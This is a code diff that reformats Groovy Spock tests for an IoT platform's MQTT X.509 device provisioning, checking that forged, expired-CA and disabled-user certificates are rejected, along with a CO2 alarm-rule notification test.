-        device1User = identityService.getIdentityProvider().createUpdateUser(managerTestSetup.realmBuildingName, device1User, null, true)
-        deviceNUser = identityService.getIdentityProvider().createUpdateUser(managerTestSetup.realmBuildingName, deviceNUser, null, true)
-
-        then: "already connected client that was authenticated should be disconnected, then reconnect"
-        conditions.eventually {
-            assert mqttBrokerService.getConnectionFromClientID(mqttDevice1ClientId) != null
-            assert mqttBrokerService.getConnectionFromClientID(mqttDevice1ClientId) != existingConnection
-            assert !defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(existingConnection))
-            assert responseSubscribed(mqttDevice1ClientId, device1ResponseTopic)
-        }
-
-        when: "the re-connected client re-authenticates"
-        device1Responses.clear()
-        device1Client.sendMessage(
-                new MQTTMessage<String>(device1RequestTopic, ValueUtil.asJSON(
-                        new X509ProvisioningMessage(getClass().getResource("/org/openremote/test/provisioning/device1.pem").text)
-                ).orElse(null))
-        )
-
-        then: "the broker should have published to the response topic an error message"
-        conditions.eventually {
-            assert device1Responses.size() == 1
-            assert device1Responses.get(0) instanceof ErrorResponseMessage
-            assert ((ErrorResponseMessage)device1Responses.get(0)).error == ErrorResponseMessage.Error.USER_DISABLED
-        }
-
-        when: "a device with disabled user account connects"
-        deviceNResponses.clear()
-        deviceNClient = new MQTT_IOClient(mqttDeviceNClientId, mqttHost, mqttPort, false, false, null, null, null)
-        deviceNClient.setTopicSubscribeFailureConsumer(deviceNSubscribeFailureCallback)
-        deviceNClient.connect()
-
-        then: "mqtt connection should exist"
-        conditions.eventually {
-            assert deviceNClient.getConnectionStatus() == ConnectionStatus.CONNECTED
-            assert mqttBrokerService.getConnectionFromClientID(mqttDeviceNClientId) != null
-        }
-
-        when: "the client subscribes to the provisioning endpoints"
-        deviceNClient.addMessageConsumer(deviceNResponseTopic, deviceNMessageConsumer)
-
-        then: "the subscriptions should succeed"
-        conditions.eventually {
-            assert deviceNClient.topicConsumerMap.get(deviceNResponseTopic) != null
-            assert deviceNClient.topicConsumerMap.get(deviceNResponseTopic).consumers.size() == 1
-            assert responseSubscribed(mqttDeviceNClientId, deviceNResponseTopic)
-            assert mqttBrokerService.getConnectionFromClientID(mqttDeviceNClientId) != null
-        }
-
-        when: "the client publishes a valid x509 certificate that has been signed by the CA stored in the provisioning config but against an expired certificate"
-        deviceNClient.sendMessage(
-                new MQTTMessage<String>(deviceNRequestTopic, ValueUtil.asJSON(
-                        new X509ProvisioningMessage(getClass().getResource("/org/openremote/test/provisioning/device3_caexpired.pem").text)
-                ).orElse(null))
-        )
-
-        then: "the broker should have published to the response topic an error message"
-        conditions.eventually {
-            assert deviceNResponses.size() == 1
-            assert deviceNResponses.get(0) instanceof ErrorResponseMessage
-            assert ((ErrorResponseMessage)deviceNResponses.get(0)).error == ErrorResponseMessage.Error.USER_DISABLED
-        }
-
-        when: "a client user is re-enabled"
-        existingConnection = mqttBrokerService.getConnectionFromClientID(mqttDevice1ClientId)
-        mqttBrokerService.getConnectionFromClientID(mqttDeviceNClientId)
-        device1User.setEnabled(true)
-        device1User = identityService.getIdentityProvider().createUpdateUser(managerTestSetup.realmBuildingName, device1User, null, true)
-
-        and: "the re-enabled client device publishes its' valid client certificate"
-        device1Responses.clear()
-        device1Client.sendMessage(
-                new MQTTMessage<String>(device1RequestTopic, ValueUtil.asJSON(
-                        new X509ProvisioningMessage(getClass().getResource("/org/openremote/test/provisioning/device1.pem").text)
-                ).orElse(null))
-        )
-
-        then: "the broker should have published to the response topic a success message containing the provisioned asset"
-        conditions.eventually {
-            assert device1Responses.size() == 1
-            assert device1Responses.get(0) instanceof SuccessResponseMessage
-            assert ((SuccessResponseMessage)device1Responses.get(0)).realm == managerTestSetup.realmBuildingName
-            asset = ((SuccessResponseMessage)device1Responses.get(0)).asset
-            assert asset != null
-            assert asset instanceof WeatherAsset
-            assert asset.getAttribute("serialNumber").flatMap{it.getValue()}.orElse(null) == device1UniqueId
-        }
-
-        cleanup: "disconnect the clients"
-        if (device1Client != null) {
-            device1Client.disconnect()
-        }
-        if (device1SnoopClient != null) {
-            device1SnoopClient.disconnect()
-        }
-        if (deviceNClient != null) {
-            deviceNClient.disconnect()
-        }
-        if (internalConsumer != null) {
-            clientEventService.removeSubscription {internalConsumer}
-        }
+    then: "the broker should have published to the response topic an error message"
+    conditions.eventually {
+      assert deviceNResponses.size() == 1
+      assert deviceNResponses.get(0) instanceof ErrorResponseMessage
+      assert ((ErrorResponseMessage)deviceNResponses.get(0)).error == ErrorResponseMessage.Error.UNAUTHORIZED
     }
+
+    when: "the client disconnects"
+    deviceNClient.removeAllMessageConsumers()
+    deviceNClient.disconnect()
+
+    then: "the connection should be removed from the broker"
+    conditions.eventually {
+      assert mqttBrokerService.clientIDConnectionMap.get(mqttDeviceNClientId) == null
+      assert deviceNClient.getConnectionStatus() == ConnectionStatus.DISCONNECTED
+    }
+
+    when: "another device connects"
+    deviceNResponses.clear()
+    deviceNUniqueId = "device4"
+    deviceNRequestTopic = "$PROVISIONING_TOKEN/$deviceNUniqueId/$REQUEST_TOKEN".toString()
+    deviceNResponseTopic = "$PROVISIONING_TOKEN/$deviceNUniqueId/$RESPONSE_TOKEN".toString()
+    deviceNClient = new MQTT_IOClient(mqttDeviceNClientId, mqttHost, mqttPort, false, false, null, null, null)
+    deviceNClient.setTopicSubscribeFailureConsumer(deviceNSubscribeFailureCallback)
+    deviceNClient.connect()
+
+    then: "mqtt connection should exist"
+    conditions.eventually {
+      assert deviceNClient.getConnectionStatus() == ConnectionStatus.CONNECTED
+      assert mqttBrokerService.getConnectionFromClientID(mqttDeviceNClientId) != null
+    }
+
+    when: "the client subscribes to the provisioning endpoints"
+    deviceNClient.addMessageConsumer(deviceNResponseTopic, deviceNMessageConsumer)
+
+    then: "the subscriptions should succeed"
+    conditions.eventually {
+      assert deviceNClient.topicConsumerMap.get(deviceNResponseTopic) != null
+      assert deviceNClient.topicConsumerMap.get(deviceNResponseTopic).consumers.size() == 1
+      assert responseSubscribed(mqttDeviceNClientId, deviceNResponseTopic)
+      assert mqttBrokerService.getConnectionFromClientID(mqttDeviceNClientId) != null
+    }
+
+    when: "the client publishes a forged x509 certificate that has been signed by a forged CA"
+    deviceNClient.sendMessage(
+            new MQTTMessage<String>(deviceNRequestTopic, ValueUtil.asJSON(
+                    new X509ProvisioningMessage(getClass().getResource("/org/openremote/test/provisioning/device4_forged.pem").text)
+                    ).orElse(null))
+            )
+
+    then: "the broker should have published to the response topic an error message"
+    conditions.eventually {
+      assert deviceNResponses.size() == 1
+      assert deviceNResponses.get(0) instanceof ErrorResponseMessage
+      assert ((ErrorResponseMessage)deviceNResponses.get(0)).error == ErrorResponseMessage.Error.UNAUTHORIZED
+    }
+
+    when: "the client disconnects"
+    deviceNClient.removeAllMessageConsumers()
+    deviceNClient.disconnect()
+
+    then: "the connection should be removed from the broker"
+    conditions.eventually {
+      assert mqttBrokerService.clientIDConnectionMap.get(mqttDeviceNClientId) == null
+      assert deviceNClient.getConnectionStatus() == ConnectionStatus.DISCONNECTED
+    }
+
+    when: "another device connects"
+    deviceNResponses.clear()
+    deviceNUniqueId = "device3"
+    deviceNRequestTopic = "$PROVISIONING_TOKEN/$deviceNUniqueId/$REQUEST_TOKEN".toString()
+    deviceNResponseTopic = "$PROVISIONING_TOKEN/$deviceNUniqueId/$RESPONSE_TOKEN".toString()
+    deviceNClient = new MQTT_IOClient(mqttDeviceNClientId, mqttHost, mqttPort, false, false, null, null, null)
+    deviceNClient.setTopicSubscribeFailureConsumer(deviceNSubscribeFailureCallback)
+    deviceNClient.connect()
+
+    then: "mqtt connection should exist"
+    conditions.eventually {
+      assert deviceNClient.getConnectionStatus() == ConnectionStatus.CONNECTED
+      assert mqttBrokerService.getConnectionFromClientID(mqttDeviceNClientId) != null
+    }
+
+    when: "the client subscribes to the provisioning endpoints"
+    deviceNClient.addMessageConsumer(deviceNResponseTopic, deviceNMessageConsumer)
+
+    then: "the subscriptions should succeed"
+    conditions.eventually {
+      assert deviceNClient.topicConsumerMap.get(deviceNResponseTopic) != null
+      assert deviceNClient.topicConsumerMap.get(deviceNResponseTopic).consumers.size() == 1
+      assert responseSubscribed(mqttDeviceNClientId, deviceNResponseTopic)
+      assert mqttBrokerService.getConnectionFromClientID(mqttDeviceNClientId) != null
+    }
+
+    when: "the client publishes a valid x509 certificate that has been signed by the CA stored in the provisioning config but against an expired certificate"
+    deviceNClient.sendMessage(
+            new MQTTMessage<String>(deviceNRequestTopic, ValueUtil.asJSON(
+                    new X509ProvisioningMessage(getClass().getResource("/org/openremote/test/provisioning/device3_caexpired.pem").text)
+                    ).orElse(null))
+            )
+
+    then: "the broker should have published to the response topic a success message containing the provisioned asset"
+    conditions.eventually {
+      assert deviceNResponses.size() == 1
+      assert deviceNResponses.get(0) instanceof SuccessResponseMessage
+      assert ((SuccessResponseMessage)deviceNResponses.get(0)).realm == managerTestSetup.realmBuildingName
+      asset = ((SuccessResponseMessage)deviceNResponses.get(0)).asset
+      assert asset != null
+      assert asset instanceof WeatherAsset
+      assert asset.getAttribute("serialNumber").flatMap{
+        it.getValue()
+      }.orElse(null) == deviceNUniqueId
+    }
+
+    when: "the client disconnects"
+    deviceNClient.removeAllMessageConsumers()
+    deviceNClient.disconnect()
+
+    then: "the connection should be removed from the broker"
+    conditions.eventually {
+      assert mqttBrokerService.clientIDConnectionMap.get(mqttDeviceNClientId) == null
+      assert deviceNClient.getConnectionStatus() == ConnectionStatus.DISCONNECTED
+    }
+
+    when: "the provisioning config is updated to disabled"
+    existingConnection = mqttBrokerService.getConnectionFromClientID(mqttDevice1ClientId)
+    device1Responses.clear()
+    connectionStatuses.clear()
+    subscribeFailures.clear()
+    provisioningConfig.setDisabled(true)
+    provisioningConfig = provisioningService.merge(provisioningConfig)
+
+    then: "already connected client that was authenticated should be disconnected, then reconnect and should fail to re-subscribe to asset and attribute events"
+    conditions.eventually {
+      assert connectionStatuses.size() >= 1
+      assert connectionStatuses.get(0) == ConnectionStatus.CONNECTING
+      assert mqttBrokerService.getConnectionFromClientID(mqttDevice1ClientId) != null
+      assert mqttBrokerService.getConnectionFromClientID(mqttDevice1ClientId) != existingConnection
+      connection = mqttBrokerService.getConnectionFromClientID(mqttDevice1ClientId)
+      assert connection != null
+      subscribeFailures.size() == 2
+      assert responseSubscribed(mqttDevice1ClientId, device1ResponseTopic)
+    }
+
+    when: "the re-connected client re-authenticates"
+    device1Responses.clear()
+    device1Client.sendMessage(
+            new MQTTMessage<String>(device1RequestTopic, ValueUtil.asJSON(
+                    new X509ProvisioningMessage(getClass().getResource("/org/openremote/test/provisioning/device1.pem").text)
+                    ).orElse(null))
+            )
+
+    then: "the broker should have published to the response topic an error message"
+    conditions.eventually {
+      assert device1Responses.size() == 1
+      assert device1Responses.get(0) instanceof ErrorResponseMessage
+      assert ((ErrorResponseMessage)device1Responses.get(0)).error == ErrorResponseMessage.Error.CONFIG_DISABLED
+    }
+
+    when: "another device re-connects"
+    deviceNResponses.clear()
+    deviceNClient = new MQTT_IOClient(mqttDeviceNClientId, mqttHost, mqttPort, false, false, null, null, null)
+    deviceNClient.setTopicSubscribeFailureConsumer(deviceNSubscribeFailureCallback)
+    deviceNClient.connect()
+
+    then: "mqtt connection should exist"
+    conditions.eventually {
+      assert deviceNClient.getConnectionStatus() == ConnectionStatus.CONNECTED
+      assert mqttBrokerService.getConnectionFromClientID(mqttDeviceNClientId) != null
+    }
+
+    when: "the client subscribes to the provisioning endpoints"
+    deviceNClient.addMessageConsumer(deviceNResponseTopic, deviceNMessageConsumer)
+
+    then: "the subscriptions should succeed"
+    conditions.eventually {
+      assert deviceNClient.topicConsumerMap.get(deviceNResponseTopic) != null
+      assert deviceNClient.topicConsumerMap.get(deviceNResponseTopic).consumers.size() == 1
+      assert responseSubscribed(mqttDeviceNClientId, deviceNResponseTopic)
+      assert mqttBrokerService.getConnectionFromClientID(mqttDeviceNClientId) != null
+    }
+
+    when: "the client publishes a valid x509 certificate that has been signed by the CA stored in the provisioning config but against an expired certificate"
+    deviceNClient.sendMessage(
+            new MQTTMessage<String>(deviceNRequestTopic, ValueUtil.asJSON(
+                    new X509ProvisioningMessage(getClass().getResource("/org/openremote/test/provisioning/device3_caexpired.pem").text)
+                    ).orElse(null))
+            )
+
+    then: "the broker should have published to the response topic an error message"
+    conditions.eventually {
+      assert deviceNResponses.size() == 1
+      assert deviceNResponses.get(0) instanceof ErrorResponseMessage
+      assert ((ErrorResponseMessage)deviceNResponses.get(0)).error == ErrorResponseMessage.Error.CONFIG_DISABLED
+    }
+
+    when: "the client disconnects"
+    deviceNClient.removeAllMessageConsumers()
+    deviceNClient.disconnect()
+
+    then: "the connection should be removed from the broker"
+    conditions.eventually {
+      assert mqttBrokerService.clientIDConnectionMap.get(mqttDeviceNClientId) == null
+      assert deviceNClient.getConnectionStatus() == ConnectionStatus.DISCONNECTED
+    }
+
+    when: "the provisioning config is updated to enabled"
+    provisioningConfig.setDisabled(false)
+    provisioningConfig = provisioningService.merge(provisioningConfig)
+
+    and: "the already connected device publishes its' valid client certificate"
+    device1Responses.clear()
+    conditions.eventually {
+      assert responseSubscribed(mqttDevice1ClientId, device1ResponseTopic)
+    }
+    device1Client.sendMessage(
+            new MQTTMessage<String>(device1RequestTopic, ValueUtil.asJSON(
+                    new X509ProvisioningMessage(getClass().getResource("/org/openremote/test/provisioning/device1.pem").text)
+                    ).orElse(null))
+            )
+
+    then: "the broker should have published to the response topic a success message containing the provisioned asset"
+    conditions.eventually {
+      assert device1Responses.size() == 1
+      assert device1Responses.get(0) instanceof SuccessResponseMessage
+      assert ((SuccessResponseMessage)device1Responses.get(0)).realm == managerTestSetup.realmBuildingName
+      asset = ((SuccessResponseMessage)device1Responses.get(0)).asset
+      assert asset != null
+      assert asset instanceof WeatherAsset
+      assert asset.getAttribute("serialNumber").flatMap{
+        it.getValue()
+      }.orElse(null) == device1UniqueId
+    }
+
+    when: "a connected device user is disabled and an un-connected device user is disabled"
+    existingConnection = mqttBrokerService.getConnectionFromClientID(mqttDevice1ClientId)
+    def device1User = identityService.getIdentityProvider().getUserByUsername(managerTestSetup.realmBuildingName, User.SERVICE_ACCOUNT_PREFIX + PROVISIONING_USER_PREFIX + device1UniqueId)
+    def deviceNUser = identityService.getIdentityProvider().getUserByUsername(managerTestSetup.realmBuildingName, User.SERVICE_ACCOUNT_PREFIX + PROVISIONING_USER_PREFIX + deviceNUniqueId)
+    device1User.setEnabled(false)
+    deviceNUser.setEnabled(false)
+    device1User = identityService.getIdentityProvider().createUpdateUser(managerTestSetup.realmBuildingName, device1User, null, true)
+    deviceNUser = identityService.getIdentityProvider().createUpdateUser(managerTestSetup.realmBuildingName, deviceNUser, null, true)
+
+    then: "already connected client that was authenticated should be disconnected, then reconnect"
+    conditions.eventually {
+      assert mqttBrokerService.getConnectionFromClientID(mqttDevice1ClientId) != null
+      assert mqttBrokerService.getConnectionFromClientID(mqttDevice1ClientId) != existingConnection
+      assert !defaultMQTTHandler.sessionSubscriptionConsumers.containsKey(getConnectionIDString(existingConnection))
+      assert responseSubscribed(mqttDevice1ClientId, device1ResponseTopic)
+    }
+
+    when: "the re-connected client re-authenticates"
+    device1Responses.clear()
+    device1Client.sendMessage(
+            new MQTTMessage<String>(device1RequestTopic, ValueUtil.asJSON(
+                    new X509ProvisioningMessage(getClass().getResource("/org/openremote/test/provisioning/device1.pem").text)
+                    ).orElse(null))
+            )
+
+    then: "the broker should have published to the response topic an error message"
+    conditions.eventually {
+      assert device1Responses.size() == 1
+      assert device1Responses.get(0) instanceof ErrorResponseMessage
+      assert ((ErrorResponseMessage)device1Responses.get(0)).error == ErrorResponseMessage.Error.USER_DISABLED
+    }
+
+    when: "a device with disabled user account connects"
+    deviceNResponses.clear()
+    deviceNClient = new MQTT_IOClient(mqttDeviceNClientId, mqttHost, mqttPort, false, false, null, null, null)
+    deviceNClient.setTopicSubscribeFailureConsumer(deviceNSubscribeFailureCallback)
+    deviceNClient.connect()
+
+    then: "mqtt connection should exist"
+    conditions.eventually {
+      assert deviceNClient.getConnectionStatus() == ConnectionStatus.CONNECTED
+      assert mqttBrokerService.getConnectionFromClientID(mqttDeviceNClientId) != null
+    }
+
+    when: "the client subscribes to the provisioning endpoints"
+    deviceNClient.addMessageConsumer(deviceNResponseTopic, deviceNMessageConsumer)
+
+    then: "the subscriptions should succeed"
+    conditions.eventually {
+      assert deviceNClient.topicConsumerMap.get(deviceNResponseTopic) != null
+      assert deviceNClient.topicConsumerMap.get(deviceNResponseTopic).consumers.size() == 1
+      assert responseSubscribed(mqttDeviceNClientId, deviceNResponseTopic)
+      assert mqttBrokerService.getConnectionFromClientID(mqttDeviceNClientId) != null
+    }
+
+    when: "the client publishes a valid x509 certificate that has been signed by the CA stored in the provisioning config but against an expired certificate"
+    deviceNClient.sendMessage(
+            new MQTTMessage<String>(deviceNRequestTopic, ValueUtil.asJSON(
+                    new X509ProvisioningMessage(getClass().getResource("/org/openremote/test/provisioning/device3_caexpired.pem").text)
+                    ).orElse(null))
+            )
+
+    then: "the broker should have published to the response topic an error message"
+    conditions.eventually {
+      assert deviceNResponses.size() == 1
+      assert deviceNResponses.get(0) instanceof ErrorResponseMessage
+      assert ((ErrorResponseMessage)deviceNResponses.get(0)).error == ErrorResponseMessage.Error.USER_DISABLED
+    }
+
+    when: "a client user is re-enabled"
+    existingConnection = mqttBrokerService.getConnectionFromClientID(mqttDevice1ClientId)
+    mqttBrokerService.getConnectionFromClientID(mqttDeviceNClientId)
+    device1User.setEnabled(true)
+    device1User = identityService.getIdentityProvider().createUpdateUser(managerTestSetup.realmBuildingName, device1User, null, true)
+
+    and: "the re-enabled client device publishes its' valid client certificate"
+    device1Responses.clear()
+    device1Client.sendMessage(
+            new MQTTMessage<String>(device1RequestTopic, ValueUtil.asJSON(
+                    new X509ProvisioningMessage(getClass().getResource("/org/openremote/test/provisioning/device1.pem").text)
+                    ).orElse(null))
+            )
+
+    then: "the broker should have published to the response topic a success message containing the provisioned asset"
+    conditions.eventually {
+      assert device1Responses.size() == 1
+      assert device1Responses.get(0) instanceof SuccessResponseMessage
+      assert ((SuccessResponseMessage)device1Responses.get(0)).realm == managerTestSetup.realmBuildingName
+      asset = ((SuccessResponseMessage)device1Responses.get(0)).asset
+      assert asset != null
+      assert asset instanceof WeatherAsset
+      assert asset.getAttribute("serialNumber").flatMap{
+        it.getValue()
+      }.orElse(null) == device1UniqueId
+    }
+
+    cleanup: "disconnect the clients"
+    if (device1Client != null) {
+      device1Client.disconnect()
+    }
+    if (device1SnoopClient != null) {
+      device1SnoopClient.disconnect()
+    }
+    if (deviceNClient != null) {
+      deviceNClient.disconnect()
+    }
+    if (internalConsumer != null) {
+      clientEventService.removeSubscription {internalConsumer}
+    }
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/rules/AlarmRuleTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/rules/AlarmRuleTest.groovy
@@ -47,236 +47,234 @@ import spock.util.concurrent.PollingConditions
 
 class AlarmRuleTest extends Specification implements ManagerContainerTrait {
 
-    @Shared
-    static KeycloakTestSetup keycloakTestSetup
+  @Shared
+  static KeycloakTestSetup keycloakTestSetup
 
-    @Shared
-    static ManagerTestSetup managerTestSetup
+  @Shared
+  static ManagerTestSetup managerTestSetup
 
-    @Shared
-    static String alarmsReadWriteUserId
+  @Shared
+  static String alarmsReadWriteUserId
 
-    @Shared
-    static AssetProcessingService assetProcessingService
+  @Shared
+  static AssetProcessingService assetProcessingService
 
-    @Shared
-    static AlarmService alarmService
+  @Shared
+  static AlarmService alarmService
 
-    @Shared
-    static AssetStorageService assetStorageService
+  @Shared
+  static AssetStorageService assetStorageService
 
-    @Shared
-    static NotificationService notificationService
+  @Shared
+  static NotificationService notificationService
 
-    @Shared
-    static RulesService rulesService
+  @Shared
+  static RulesService rulesService
 
-    @Shared
-    static RulesetStorageService rulesetStorageService
+  @Shared
+  static RulesetStorageService rulesetStorageService
 
-    @Shared
-    static List<AbstractNotificationMessage> notificationMessages = []
+  @Shared
+  static List<AbstractNotificationMessage> notificationMessages = []
 
-    def setupSpec() {
-        def container = startContainer(defaultConfig(), defaultServices())
+  def setupSpec() {
+    def container = startContainer(defaultConfig(), defaultServices())
 
-        keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
 
-        User alarmsReadWriteUser = keycloakTestSetup.createUser(managerTestSetup.realmBuildingName, "alarmsrwuser1", "alarmsrwuser1", "Alarms R/W", "User", "alarmsrwuser@openremote.local", true, KeycloakTestSetup.REGULAR_USER_ROLES)
-        alarmsReadWriteUserId = alarmsReadWriteUser.getId()
+    User alarmsReadWriteUser = keycloakTestSetup.createUser(managerTestSetup.realmBuildingName, "alarmsrwuser1", "alarmsrwuser1", "Alarms R/W", "User", "alarmsrwuser@openremote.local", true, KeycloakTestSetup.REGULAR_USER_ROLES)
+    alarmsReadWriteUserId = alarmsReadWriteUser.getId()
 
-        alarmService = container.getService(AlarmService.class)
-        assetProcessingService = container.getService(AssetProcessingService.class)
-        assetStorageService = container.getService(AssetStorageService.class)
-        notificationService = container.getService(NotificationService.class)
-        rulesetStorageService = container.getService(RulesetStorageService.class)
-        rulesService = container.getService(RulesService.class)
+    alarmService = container.getService(AlarmService.class)
+    assetProcessingService = container.getService(AssetProcessingService.class)
+    assetStorageService = container.getService(AssetStorageService.class)
+    notificationService = container.getService(NotificationService.class)
+    rulesetStorageService = container.getService(RulesetStorageService.class)
+    rulesService = container.getService(RulesService.class)
 
 
-        def emailNotificationHandler = container.getService(EmailNotificationHandler.class)
-        def throwPushHandlerException = false
-        EmailNotificationHandler mockPushNotificationHandler = Spy(emailNotificationHandler)
-        mockPushNotificationHandler.isValid() >> true
-        mockPushNotificationHandler.sendMessage(_ as Long, _ as Notification.Source, _ as String, _ as Notification.Target, _ as AbstractNotificationMessage) >> {
-            id, source, sourceId, target, message ->
-                if (throwPushHandlerException) {
-                    throw new Exception("Failed to send notification")
-                }
-                notificationMessages << message
-                callRealMethod()
-        }
-        mockPushNotificationHandler.sendMessage(_ as Message) >> {
-            message -> return NotificationSendResult.success()
-        }
-
-        notificationService.notificationHandlerMap.put(emailNotificationHandler.getTypeName(), mockPushNotificationHandler)
+    def emailNotificationHandler = container.getService(EmailNotificationHandler.class)
+    def throwPushHandlerException = false
+    EmailNotificationHandler mockPushNotificationHandler = Spy(emailNotificationHandler)
+    mockPushNotificationHandler.isValid() >> true
+    mockPushNotificationHandler.sendMessage(_ as Long, _ as Notification.Source, _ as String, _ as Notification.Target, _ as AbstractNotificationMessage) >> { id, source, sourceId, target, message ->
+      if (throwPushHandlerException) {
+        throw new Exception("Failed to send notification")
+      }
+      notificationMessages << message
+      callRealMethod()
+    }
+    mockPushNotificationHandler.sendMessage(_ as Message) >> { message ->
+      return NotificationSendResult.success()
     }
 
-    def cleanup() {
-        // Remove all alarms
-        def alarms = alarmService.getAlarms(managerTestSetup.realmBuildingName, null, null, null)
-        if (alarms.size() > 0) {
-            alarmService.removeAlarms(alarms, (List<Long>) alarms.collect { it.id })
-        }
+    notificationService.notificationHandlerMap.put(emailNotificationHandler.getTypeName(), mockPushNotificationHandler)
+  }
 
-        // Remove all rulesets
-        List<RealmRuleset> rulesets = rulesetStorageService.findAll(RealmRuleset.class, new RulesetQuery().setRealm(managerTestSetup.realmBuildingName).setLanguages(Ruleset.Lang.JSON))
-        rulesets.forEach { ruleset -> rulesetStorageService.delete(RealmRuleset.class, ruleset.id) }
-
-        // Clear notifications
-        notificationMessages.clear()
+  def cleanup() {
+    // Remove all alarms
+    def alarms = alarmService.getAlarms(managerTestSetup.realmBuildingName, null, null, null)
+    if (alarms.size() > 0) {
+      alarmService.removeAlarms(alarms, (List<Long>) alarms.collect { it.id })
     }
 
-    @Shared
-    createAlarmRule = { severity, assigneeId ->
-        when: "a ruleset with a notification action is created in the building realm"
-        def rulesStr = getClass().getResource("/org/openremote/test/rules/CO2AlarmRule.json").text
-        JsonRulesetDefinition rulesetDef = ValueUtil.JSON.readValue(rulesStr, JsonRulesetDefinition.class)
-        rulesetDef.rules[0].when.groups.get(0).items.get(0).assets.ids(managerTestSetup.apartment2LivingroomId)
-        ((RuleActionAlarm) rulesetDef.rules[0].then[0]).alarm.setSeverity(severity)
-        ((RuleActionAlarm) rulesetDef.rules[0].then[0]).assigneeId = assigneeId
-        rulesStr = ValueUtil.JSON.writeValueAsString(rulesetDef)
-        def realmRuleset = new RealmRuleset(managerTestSetup.realmBuildingName, "CO2 Alarm Rule", Ruleset.Lang.JSON, rulesStr)
-        realmRuleset = rulesetStorageService.merge(realmRuleset)
+    // Remove all rulesets
+    List<RealmRuleset> rulesets = rulesetStorageService.findAll(RealmRuleset.class, new RulesetQuery().setRealm(managerTestSetup.realmBuildingName).setLanguages(Ruleset.Lang.JSON))
+    rulesets.forEach { ruleset -> rulesetStorageService.delete(RealmRuleset.class, ruleset.id) }
 
-        then: "the ruleset should reach the engine"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
-        conditions.eventually {
-            assert rulesService.realmEngines.containsKey(managerTestSetup.realmBuildingName)
-            def deployment = rulesService.realmEngines.get(managerTestSetup.realmBuildingName).deployments.get(realmRuleset.id)
-            assert deployment != null
-            assert deployment.ruleset.version == realmRuleset.version
-        }
+    // Clear notifications
+    notificationMessages.clear()
+  }
 
-        realmRuleset
+  @Shared
+  createAlarmRule = { severity, assigneeId ->
+    when: "a ruleset with a notification action is created in the building realm"
+    def rulesStr = getClass().getResource("/org/openremote/test/rules/CO2AlarmRule.json").text
+    JsonRulesetDefinition rulesetDef = ValueUtil.JSON.readValue(rulesStr, JsonRulesetDefinition.class)
+    rulesetDef.rules[0].when.groups.get(0).items.get(0).assets.ids(managerTestSetup.apartment2LivingroomId)
+    ((RuleActionAlarm) rulesetDef.rules[0].then[0]).alarm.setSeverity(severity)
+    ((RuleActionAlarm) rulesetDef.rules[0].then[0]).assigneeId = assigneeId
+    rulesStr = ValueUtil.JSON.writeValueAsString(rulesetDef)
+    def realmRuleset = new RealmRuleset(managerTestSetup.realmBuildingName, "CO2 Alarm Rule", Ruleset.Lang.JSON, rulesStr)
+    realmRuleset = rulesetStorageService.merge(realmRuleset)
+
+    then: "the ruleset should reach the engine"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    conditions.eventually {
+      assert rulesService.realmEngines.containsKey(managerTestSetup.realmBuildingName)
+      def deployment = rulesService.realmEngines.get(managerTestSetup.realmBuildingName).deployments.get(realmRuleset.id)
+      assert deployment != null
+      assert deployment.ruleset.version == realmRuleset.version
     }
 
-    def "rule in realm with alarm action creates an alarm with severity '#severity', assignee '#assigneeId' and '#emailNotifications' emailNotifications based on attribute event"() {
-        def realmRuleset = createAlarmRule(severity, assigneeId)
-getLOG()
-        when: "the room linked attribute is updated"
-        assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.apartment2LivingroomId, "co2Level", 6000))
+    realmRuleset
+  }
 
-        then: "the linked co2Level attribute should equal the event value"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
-        conditions.eventually {
-            def asset = assetStorageService.find(managerTestSetup.apartment2LivingroomId, true)
-            assert asset.getAttribute("co2Level").flatMap { it.getValue() }.orElse(null) == 6000
-        }
+  def "rule in realm with alarm action creates an alarm with severity '#severity', assignee '#assigneeId' and '#emailNotifications' emailNotifications based on attribute event"() {
+    def realmRuleset = createAlarmRule(severity, assigneeId)
+    getLOG()
+    when: "the room linked attribute is updated"
+    assetProcessingService.sendAttributeEvent(new AttributeEvent(managerTestSetup.apartment2LivingroomId, "co2Level", 6000))
 
-        and: "one alarm is created"
-        def alarms = null
-        conditions.eventually {
-            alarms = alarmService.getAlarms(managerTestSetup.realmBuildingName, null, null, null)
-            assert alarms.size() == 1
-        }
+    then: "the linked co2Level attribute should equal the event value"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    conditions.eventually {
+      def asset = assetStorageService.find(managerTestSetup.apartment2LivingroomId, true)
+      assert asset.getAttribute("co2Level").flatMap { it.getValue() }.orElse(null) == 6000
+    }
 
-        and: "the created alarm matches the rule action configuration"
-        // Timestamps are written from the container clock, which the test setup puts ahead of the wall clock, so the
-        // wall clock cannot be used as the upper bound
-        def alarmClockNow = getInstantTimeOf(container)
-        def alarm = alarms.get(0)
-        alarm.id >= 0L
-        alarm.realm == managerTestSetup.realmBuildingName
-        alarm.title == "CO2 Alarm Rule"
-        alarm.content == String.format("""\
+    and: "one alarm is created"
+    def alarms = null
+    conditions.eventually {
+      alarms = alarmService.getAlarms(managerTestSetup.realmBuildingName, null, null, null)
+      assert alarms.size() == 1
+    }
+
+    and: "the created alarm matches the rule action configuration"
+    // Timestamps are written from the container clock, which the test setup puts ahead of the wall clock, so the
+    // wall clock cannot be used as the upper bound
+    def alarmClockNow = getInstantTimeOf(container)
+    def alarm = alarms.get(0)
+    alarm.id >= 0L
+    alarm.realm == managerTestSetup.realmBuildingName
+    alarm.title == "CO2 Alarm Rule"
+    alarm.content == String.format("""\
 ID: ${managerTestSetup.apartment2LivingroomId}
 Asset name: Living Room 2
 Attribute name: co2Level
 Value: 6000
 """)
-        alarm.severity == severity
-        alarm.status == Alarm.Status.OPEN
-        alarm.source == Alarm.Source.REALM_RULESET
-        alarm.sourceId == Long.toString(realmRuleset.id)
-        alarm.createdOn.isAfter(alarmClockNow.minusSeconds(30))
